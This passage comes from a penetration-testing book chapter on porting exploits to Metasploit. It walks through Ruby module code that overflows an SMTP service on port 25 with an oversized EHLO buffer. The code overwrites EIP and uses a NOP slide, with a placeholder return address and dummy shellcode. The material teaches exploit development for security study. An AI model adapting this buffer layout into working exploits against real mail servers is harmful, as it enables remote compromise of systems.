Porting Exploits to the Metasploit Framework
219
], self.class)
end
def exploit
connect
sock.put(sploit + "\r\n")
handler
disconnect
end
end
Because this exploit does not require authentication, we need only the
mixin
Msf::Exploit::Remote::Tcp
shown at . We’ve discussed mixins in previ-
ous chapters; you’ll recall that mixins allow you to use built-in protocols such
as
Remote::Tcp
to perform basic remote TCP communications.
In the preceding listing, the target return address is set to the bogus value
Oxdeadbeef
at , and the default TCP port is set to
25
at . Upon connecting
to the target, Metasploit will send the malicious attack using
sock.put
as shown
at and craft our exploit for us.
Configuring the Exploit Definition
Let’s look at how we initially configure our exploit definition. We will need
to feed the service a greeting as required by the protocol, a large buffer, a
placeholder where we will take control of EIP, a brief NOP slide, and a place-
holder for our shellcode. Here’s the code:
def exploit
connect
sploit = "
EHLO
"
sploit << "\x41" *
5093
sploit << "\x42" *
4
sploit << "
\x90
" * 32
sploit << "
\xcc
" * 1000
sock.put(sploit + "\r\n")
handler
disconnect
end
The malicious buffer is built based on the original exploit code begin-
ning with the
EHLO
command at followed by a long string of
A
s at (5093
of them), 4 bytes to overwrite the EIP register at , a small NOP slide at ,
and then some dummy shellcode at .